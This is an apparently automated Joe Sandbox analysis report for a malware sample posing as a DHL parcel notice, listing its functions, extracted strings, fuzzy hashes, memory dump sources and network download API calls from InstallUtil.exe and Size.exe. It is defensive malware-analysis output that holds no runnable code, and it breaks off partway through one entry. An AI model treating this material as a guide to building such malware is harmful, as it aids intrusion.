Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfeab728f4ab789779530146111b73d8a22c6c3fc8145ee4bde36373c65eb6c
Instruction ID: de45f655b419859c9442d0cb6df0d8e84eca32dfdb20daa09266ae0c7055fced
Opcode Fuzzy Hash: 0cfeab728f4ab789779530146111b73d8a22c6c3fc8145ee4bde36373c65eb6c
Instruction Fuzzy Hash: 3321C9B1D056188BEB18CFABC8447DEFBF7AFC8300F18C16AD409AA254DB750A458F55

Function 027B242F Relevance: 8.9, Strings: 7, Instructions: 185COMMON

Download Yara Rule

Strings

p, xrefs: 027B2522
p, xrefs: 027B2502
p, xrefs: 027B24D2
p, xrefs: 027B2512
p, xrefs: 027B2532
p, xrefs: 027B24A2
p, xrefs: 027B24C2

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: p$p$p$p$p$p$p
API String ID: 0-3363255238
Opcode ID: 00ba2e9d7c29b9e8de5ffbc0ebc8390a3a02e2186d06b2549d985e8ea5bd0602
Instruction ID: ffa307f8b5d3dacc74cd96833da4aa23ab1ad6f71d2f1793e33d256675d7338b
Opcode Fuzzy Hash: 00ba2e9d7c29b9e8de5ffbc0ebc8390a3a02e2186d06b2549d985e8ea5bd0602
Instruction Fuzzy Hash: EF51A09291F3D15FD313463458793D63F20DE6B289B5A06E78CC4DB5BBE5094C0E83A6

Function 065EF8B0 Relevance: 7.9, Strings: 6, Instructions: 406COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065EF982
(iq, xrefs: 065EFA7A
4'eq, xrefs: 065EF934
piq, xrefs: 065EFA07
4'eq, xrefs: 065EF9FA
4'eq, xrefs: 065EF964

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (iq$4'eq$4'eq$4'eq$4'eq$piq
API String ID: 0-522782192
Opcode ID: 860cc1880e9212a6ce642ab04eb31e063aa388eaf934b12ddea8145192f15be3
Instruction ID: 177b81aaa6c906cdc6dfa97c21bf676c3361ab6c1e1d154fb4177ad1a5f2cfb3
Opcode Fuzzy Hash: 860cc1880e9212a6ce642ab04eb31e063aa388eaf934b12ddea8145192f15be3
Instruction Fuzzy Hash: C6D14D76A00114DFCF4ADFA4C944E9A7BB2FF88310B058498E609AB276DB31ED55DF90

Function 027B45B5 Relevance: 5.0, Strings: 4, Instructions: 11COMMON

Download Yara Rule

Strings

$eq, xrefs: 027B4756
TJjq, xrefs: 027B472A
$eq, xrefs: 027B476C
jjjjjj, xrefs: 027B46B4

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$jjjjjj$$eq$$eq
API String ID: 0-588169492
Opcode ID: a6b70010130546eb80e3d3f128d7997efe30fb3418b742032328b43de7ba0883
Instruction ID: 8c70ed100a72d630abd57e6b5643bfe6ceb274e106dbbc0e66ae892f6a9bae5a
Opcode Fuzzy Hash: a6b70010130546eb80e3d3f128d7997efe30fb3418b742032328b43de7ba0883
Instruction Fuzzy Hash: 6AC0124040E7E08ECB275A2848F13B43F206D53200309D1E6C48A4F057C528888AE333

Function 027B4575 Relevance: 5.0, Strings: 4, Instructions: 9COMMON

Download Yara Rule

Strings

$eq, xrefs: 027B4756
TJjq, xrefs: 027B472A
$eq, xrefs: 027B476C
jjjjjj, xrefs: 027B46B4

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$jjjjjj$$eq$$eq
API String ID: 0-588169492
Opcode ID: 80a07356f79862fe7b43ab36788da6e47969ccbad9fe4d90e074cf944b350d62
Instruction ID: 6e64221aa0146ea15e83dab4d6416be78faef0049c4dc7b2ffd05a0584f56631
Opcode Fuzzy Hash: 80a07356f79862fe7b43ab36788da6e47969ccbad9fe4d90e074cf944b350d62
Instruction Fuzzy Hash: D7C08C4040E7919ECF070A1880F03F42F003D12200305E0A1C04A0B003C2248A8AE222

Function 027B45DC Relevance: 5.0, Strings: 4, Instructions: 8COMMON

Download Yara Rule

Strings

$eq, xrefs: 027B4756
TJjq, xrefs: 027B472A
$eq, xrefs: 027B476C
jjjjjj, xrefs: 027B46B4

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$jjjjjj$$eq$$eq
API String ID: 0-588169492
Opcode ID: e06a8a483e33ff73033519a485a4d254042516c66d1a8976aac82177ba58143d
Instruction ID: d571a46a29bf1050de655447e50926149dc4c8d783cc005125b6ae2908aff3f0
Opcode Fuzzy Hash: e06a8a483e33ff73033519a485a4d254042516c66d1a8976aac82177ba58143d
Instruction Fuzzy Hash: BBC02B0280F2808FCF030A1800F037C3D102D72260708D6E6CC850E063C1348885C332

Function 027B459C Relevance: 5.0, Strings: 4, Instructions: 6COMMON

Download Yara Rule

Strings

$eq, xrefs: 027B4756
TJjq, xrefs: 027B472A
$eq, xrefs: 027B476C
jjjjjj, xrefs: 027B46B4

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$jjjjjj$$eq$$eq
API String ID: 0-588169492
Opcode ID: b4fd8e85eb7b92c2da91d66a39d99c7ad587ffaa60e7e2fe4c97019c1073ee22
Instruction ID: fc02038f015dfd5056c8a573bb7416f311cf80370fcf8f8850955d04126175bc
Opcode Fuzzy Hash: b4fd8e85eb7b92c2da91d66a39d99c7ad587ffaa60e7e2fe4c97019c1073ee22
Instruction Fuzzy Hash: C0B0125940E7C1CFC7034E54C4F02A07F207E62044358C1E6C4DA0F047C020C98AD731

Analysis Process: InstallUtil.exePID: 5804, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	43.8%
Total number of Nodes:	16
Total number of Limit Nodes:	2

Executed Functions

Function 004328B0 Relevance: 4.7, APIs: 3, Instructions: 236
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00000000), ref: 00432977
InternetOpenUrlA.WININET(00000000,00000000,?,00000000,00000000,04000000,00000000), ref: 004329C5
InternetReadFile.WININET(?,00000000), ref: 00432A72

Memory Dump Source

Source File: 00000002.00000002.3287428643.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3287428643.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3287428643.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3287428643.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3287428643.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3287428643.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3287428643.0000000000419000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3287428643.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID: Internet$Open$FileRead
String ID:
API String ID: 72386350-0
Opcode ID: 4d136b0687c39e5f0fd1a259b79d16e4b33fa1ceed4ff25419a353a678d70874
Instruction ID: af0644f7c9a242e3f95f3e5706efcc32f1b94d090fde57a28912d9894c798d37
Opcode Fuzzy Hash: 4d136b0687c39e5f0fd1a259b79d16e4b33fa1ceed4ff25419a353a678d70874
Instruction Fuzzy Hash: 2F81DDB5A00209AFDB04DFE4DD85EEEBBBDEF98700F10411AF601B72A0DA746945CB64

Analysis Process: Size.exePID: 6472, Parent PID: 2680COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	99.2%
Signature Coverage:	0%
Total number of Nodes:	241
Total number of Limit Nodes:	13

Executed Functions

Function 0307B338 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbhq, xrefs: 0307B465
Teeq, xrefs: 0307BA5B
TJjq, xrefs: 0307B4DA
piq, xrefs: 0307BEF2

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: TJjq$Teeq$piq$xbhq
API String ID: 0-2649575939
Opcode ID: 8a9ca9d22206cbd8b6582f7fe2c4078da44ee7ce745f182ac0da9e1cae1155c2
Instruction ID: 75e3dedcae8f47cef8a3980d119581f666d225c7b201b28a4fabdc8165cb7a52
Opcode Fuzzy Hash: 8a9ca9d22206cbd8b6582f7fe2c4078da44ee7ce745f182ac0da9e1cae1155c2
Instruction Fuzzy Hash: 34A29275E01228CFDB65CF69C984AD9BBB2BF89304F1581E9D509AB325DB319E81CF40

Function 03074160 Relevance: 5.2, Strings: 4, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d%kq, xrefs: 03074305
$eq, xrefs: 030743C9
$eq, xrefs: 030743D5
d%kq, xrefs: 03074273

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: d%kq$d%kq$$eq$$eq
API String ID: 0-1514485977
Opcode ID: 478ba7a9bfc6d65b3fb64d8224a14c20525c1c84966e37dbc4fe18cb464f67aa
Instruction ID: a2fad8267f2d13f0a1b8c0c8d7d3bc7c8be6e07378497ccde85d6706ed096a13
Opcode Fuzzy Hash: 478ba7a9bfc6d65b3fb64d8224a14c20525c1c84966e37dbc4fe18cb464f67aa
Instruction Fuzzy Hash: D6612334F06204CFC715EA7A8C9072E7BE6FB86310F6545AAD406DB3D5DA34DC4187AA

Function 06EF0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06EF06A2
2, xrefs: 06EF101E

Memory Dump Source

Source File: 00000006.00000002.2314912407.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_Size.jbxd

Similarity

API ID:
String ID: 2$$eq
API String ID: 0-57214535
Opcode ID: 562c2ef0b05c4abeb8c1408c65d2001d7494320f6c755e95feb4fc3e9a916251
Instruction ID: de9884f9baf7bd9cc32633d30e0d1811e83548de89f8a99217173a9c6c854374
Opcode Fuzzy Hash: 562c2ef0b05c4abeb8c1408c65d2001d7494320f6c755e95feb4fc3e9a916251
Instruction Fuzzy Hash: 52E2C5B4A016288FCB65DF69D8947DABBF6FB88301F1081E9D509A7355DB34AE81CF40

Function 06EDE9B5 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

PHeq, xrefs: 06EDECC8

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: b03bb81cb6b89c7e8ddb4668957e82f92cd2a18e63c35a14b9ffacad69723eee
Instruction ID: f9fad7fe9870f3121ba4b56f75db18bc267da04b47928339186d2defa5e56233
Opcode Fuzzy Hash: b03bb81cb6b89c7e8ddb4668957e82f92cd2a18e63c35a14b9ffacad69723eee
Instruction Fuzzy Hash: 76C10B74E05318CFDBA4CF69D488B9EBBB2FB89304F2090A9D409AB255DB745D85CF41

Function 06EFE8E0 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

Teeq, xrefs: 06EFE9E2

Memory Dump Source

Source File: 00000006.00000002.2314912407.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_Size.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 88e8c5dde20098401d3b4ae14eddbaf46147a95181df4ecae9c16a80445d95a2
Instruction ID: 22f2837de88dbf618942729f1bee94c0748d5f14b8009dfd28c0722db1fb5f92
Opcode Fuzzy Hash: 88e8c5dde20098401d3b4ae14eddbaf46147a95181df4ecae9c16a80445d95a2
Instruction Fuzzy Hash: 43B10670E11318DFEBA4CFA9D584B9DBBF2BB48304F2090A9D209A7265DB746D85CF40

Function 06EFE8DB Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

Teeq, xrefs: 06EFE9E2

Memory Dump Source

Source File: 00000006.00000002.2314912407.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_Size.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 0f306d95e6d79e4376299f31cdd99c434265245d2d37ae52de1246bbea8ae19e
Instruction ID: 35917a11e5cc2d5d54f89d8f7bdd6f472c1e163729820a42c30c09ea1a2fe78c
Opcode Fuzzy Hash: 0f306d95e6d79e4376299f31cdd99c434265245d2d37ae52de1246bbea8ae19e
Instruction Fuzzy Hash: 6DB10574E11608DFDBA4CFA9D584B9DBBF2BF48304F2090A9D609A7265DB746D85CF00

Function 06EDD768 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46358bb940ed0c9e4e54e7966457d1194b8d260b3697ea9a24c6ce8c6b3957a4
Instruction ID: b7b90eb8a654b032e8b4dcc31a69dc6b433ef6a19840cb2aef356bbedd748af3
Opcode Fuzzy Hash: 46358bb940ed0c9e4e54e7966457d1194b8d260b3697ea9a24c6ce8c6b3957a4
Instruction Fuzzy Hash: 0EF10374A01318CFEB94CFA8D894B9DBBF1FF49304F1090AAD409AB291CB799985CF40

Function 06EDD765 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f415ea4c807414593147d79e962b6be01390df3ba5045f0c43362860292418c1
Instruction ID: dcf94d5e559c7df7b60d84400b5beac57caf2a743ad0578942b2f4ae6b01ed24
Opcode Fuzzy Hash: f415ea4c807414593147d79e962b6be01390df3ba5045f0c43362860292418c1
Instruction Fuzzy Hash: A0F10474A01318CFEB94CFA9D894B9DBBF1FF49314F1090AAD509AB291CB799985CF01

Function 06EF57E7 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2314912407.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_Size.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe499b269274f6ded590ea38284853a39c2b5084d30a9addcb5a0ff51bd8e3e5
Instruction ID: 704aa67c6a48efbc379b449df225d45e086d05c698246a8d7fe31683217122f9
Opcode Fuzzy Hash: fe499b269274f6ded590ea38284853a39c2b5084d30a9addcb5a0ff51bd8e3e5
Instruction Fuzzy Hash: 39D1F1B4D16358CFDB54CFA6D9487DCBBF1ABA9301F1490AAC909AB345D7349A84CF80

Function 030719B0 Relevance: 5.4, Strings: 4, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJjq, xrefs: 030719E0
TJjq, xrefs: 03071B5C
@, xrefs: 03071C03
Teeq, xrefs: 03071B45

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: @$TJjq$TJjq$Teeq
API String ID: 0-3147250315
Opcode ID: a8d6f1be800ab5fdc446e15712cde74c8d481fda4615eee2f2b097b197b3b251
Instruction ID: 659877d60321702b2c1d1b42775b09e1b79aa365bcecc19016f95a9a04f08dec
Opcode Fuzzy Hash: a8d6f1be800ab5fdc446e15712cde74c8d481fda4615eee2f2b097b197b3b251
Instruction Fuzzy Hash: 09E15A34A051049FDB08DFA8D894BADBBF2FF89710F2545A9E4069B3A6CB34ED41CB45

Function 03074556 Relevance: 5.0, Strings: 4, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 03074756
$eq, xrefs: 0307476C
TJjq, xrefs: 0307472A
jjjjjj, xrefs: 030746B4

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: TJjq$jjjjjj$$eq$$eq
API String ID: 0-588169492
Opcode ID: b4cc89a04a138e811164520d18c82af9122687264dede67a17a62c993ebfce6f
Instruction ID: f414430408cfa1a32c39debd9c21f85f59bf991da30b0c3f338b8ddcc681a450
Opcode Fuzzy Hash: b4cc89a04a138e811164520d18c82af9122687264dede67a17a62c993ebfce6f
Instruction Fuzzy Hash: ACB0921680F391CF8B428A6688D40617F20AAA2084359C5E6C4960F047C4248A8BE335

Function 06ED0470 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'eq, xrefs: 06ED0769
4'eq, xrefs: 06ED068A
4'eq, xrefs: 06ED07E9

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$4'eq
API String ID: 0-3023824364
Opcode ID: 3654d0e3effdbf116a2af87f7148c71c87e77cc2a15cdc72f6888f8b63dc070e
Instruction ID: b3d23a156edef623e7c14544797a56ddadfab2fca6756539fda4008a346a63d7
Opcode Fuzzy Hash: 3654d0e3effdbf116a2af87f7148c71c87e77cc2a15cdc72f6888f8b63dc070e
Instruction Fuzzy Hash: D4F1EB34A11218DFCB48EFA4D998A9DB7B2FF88310F559158E506AB3A5DB35EC42CF40

Function 06ED1358 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,iq, xrefs: 06ED16D3

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: ,iq
API String ID: 0-1887606315
Opcode ID: f965fbab08f4bca033501af46ba8cde09d270f1a12afb4735e3baa827513cd53
Instruction ID: 383741d4c3f8b51232bd79694df1820f4c551d055005d0a6f5cc80bfc8dbe598
Opcode Fuzzy Hash: f965fbab08f4bca033501af46ba8cde09d270f1a12afb4735e3baa827513cd53
Instruction Fuzzy Hash: C0521A79A002288FDB65CF69C951BDDBBF2BF88300F1541D9E549AB391DA309E81CF61

Function 0307E0B8 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_eq, xrefs: 0307E345

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: (_eq
API String ID: 0-480964360
Opcode ID: f5d220cdca594e395cf2e1869a3e5ad470867216e104e7ce64abe3fc1a00c834
Instruction ID: 1507f76175ac4e5de128be0993fa5f47852c6a098acdcfa9c2a0235737f49935
Opcode Fuzzy Hash: f5d220cdca594e395cf2e1869a3e5ad470867216e104e7ce64abe3fc1a00c834
Instruction Fuzzy Hash: F7227D75B022049FCB54CFA8D494AADBBF2FF88310F148599E905AB3A1DB75ED80CB54

Function 06ED2201 Relevance: 1.6, Strings: 1, Instructions: 394COMMON

Download Yara Rule

Strings

$eq, xrefs: 06ED2327

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: $eq
API String ID: 0-731066626
Opcode ID: 8d6ce7d3a7b2951a7b18ba864e82273a5eadffdc6e1687b5f5172950cedb87f0
Instruction ID: 1b6d0f0ed371e563589868da6a8fdb4f20b0152526ca7c39316e3a2608478f79
Opcode Fuzzy Hash: 8d6ce7d3a7b2951a7b18ba864e82273a5eadffdc6e1687b5f5172950cedb87f0
Instruction Fuzzy Hash: 51E1E374B003028FDB95AF29C5116BEBBE2AFC4210F1455A9D792CB3E1DA35CE42CB61

Function 06ED9760 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

(iq, xrefs: 06ED98F9

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: 125cff64b49649966a297371fd4198e24e33cf913d3b74a09dec6ed0c85aa442
Instruction ID: c616b18b02e7cf5778e043c54c1735c078a3d77f6659ce197723ee9f74a3bd89
Opcode Fuzzy Hash: 125cff64b49649966a297371fd4198e24e33cf913d3b74a09dec6ed0c85aa442
Instruction Fuzzy Hash: B0718C75F007099FCB54DFA9D9406AEBBF6BFC8310F249469D549AB381DB30A902CB91

Function 030764F5 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

zq, xrefs: 030764FC

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: zq
API String ID: 0-2675598353
Opcode ID: 6f0997fc0cb0b58a6e1055a89a39d3e49572de1cc03549f95281e2b1e58e708b
Instruction ID: cb01423ca70c2a66ff9ecd0613ea4714747d72c1365d1602f416c2c9645965aa
Opcode Fuzzy Hash: 6f0997fc0cb0b58a6e1055a89a39d3e49572de1cc03549f95281e2b1e58e708b
Instruction Fuzzy Hash: FC418770D012489FDB11CFA9C990AEEBFF1EF49340F28846AE849AB251DB759901CF50

Function 06EF2BF8 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

TJjq, xrefs: 06EF2D5B

Memory Dump Source

Source File: 00000006.00000002.2314912407.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_Size.jbxd

Similarity

API ID:
String ID: TJjq
API String ID: 0-2687929720
Opcode ID: a741237c0109724e7d052fe926a7d613160953abdc7182c680053e0089642109
Instruction ID: 81fbaa22461a9c04ab56af4126d3dc6763cc17e484ecf988fa42c2c60a8d8f1f
Opcode Fuzzy Hash: a741237c0109724e7d052fe926a7d613160953abdc7182c680053e0089642109
Instruction Fuzzy Hash: 9E71E878E113088FDB44DFA9D44869EBBF2FB89304F20806AD605AB354DB349945CF51

Function 06EF2C08 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

TJjq, xrefs: 06EF2D5B

Memory Dump Source

Source File: 00000006.00000002.2314912407.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_Size.jbxd

Similarity

API ID:
String ID: TJjq
API String ID: 0-2687929720
Opcode ID: 372ae00319408f65580c3c55f03ab7ebfbcbe415017ce8b4b3df8f81a9dc89be
Instruction ID: 48d439d73b3c00940d1b7af94d9b850c6a691e2d648dacf01f611549b0fc2e68
Opcode Fuzzy Hash: 372ae00319408f65580c3c55f03ab7ebfbcbe415017ce8b4b3df8f81a9dc89be
Instruction Fuzzy Hash: 4371C7B8E113089FDB44DFAAD4886DEBBF2FB89300F209069D615AB354DB349945CF51

Function 06ED4128 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06ED4162

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: e8e9abc6f1f79d4dafca8c4763bbb10b54b8c8246069f6943d7cf8f8f147e297
Instruction ID: 82ec6664efdec87c0991e38eb7f0f2806d10e6355856535a4c006d58d082f06e
Opcode Fuzzy Hash: e8e9abc6f1f79d4dafca8c4763bbb10b54b8c8246069f6943d7cf8f8f147e297
Instruction Fuzzy Hash: 32416C34B107148FCB84AB68C8A4AAEB7FBEFC9610F105529D502AB394CF749C07CB91

Function 03070D9F Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

Teeq, xrefs: 03070E8C

Memory Dump Source

Source File: 00000006.00000002.2292730880.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3070000_Size.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 353fde2fd9aa51e4677c2676dac169dd3a59a7762ceb8552656084c39515202d
Instruction ID: 7360ef55f2b9a206deeb9567e2280b9b44582083e25bd204e468bc3c82647c99
Opcode Fuzzy Hash: 353fde2fd9aa51e4677c2676dac169dd3a59a7762ceb8552656084c39515202d
Instruction Fuzzy Hash: 8541B234B012149FCB04EBB9D4586ADBBF7EFC9310F244469E406EB3A0DE759C028B95

Function 06ED3B20 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06ED3BD7

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 8b42b717ccf48c6e7d72f516a450347bfde9f9bd702c597e9313699b44c2a307
Instruction ID: f3628fc653d425c48165a44fd54094ba6e4815d8fada064165cb88ea80ec81a5
Opcode Fuzzy Hash: 8b42b717ccf48c6e7d72f516a450347bfde9f9bd702c597e9313699b44c2a307
Instruction Fuzzy Hash: D54189753007109FD349DB69C855B2B7BAAAFC9710F1044A8E606CF3A6DE75EC42C7A1

Function 06ED3B30 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06ED3BD7

Memory Dump Source

Source File: 00000006.00000002.2314775222.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ed0000_Size.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 0ca46363065edd148ac4cc70b140db6ca1dd9629f9c81687363d8918c013129b
Instruction ID: 5b79d3f16bbf84913b64030a3e6d972361daf2e85affe1b65a9dd642dfbdbc4f
Opcode Fuzzy Hash: 0ca46363065edd148ac4cc70b140db6ca1dd9629f9c81687363d8918c013129b
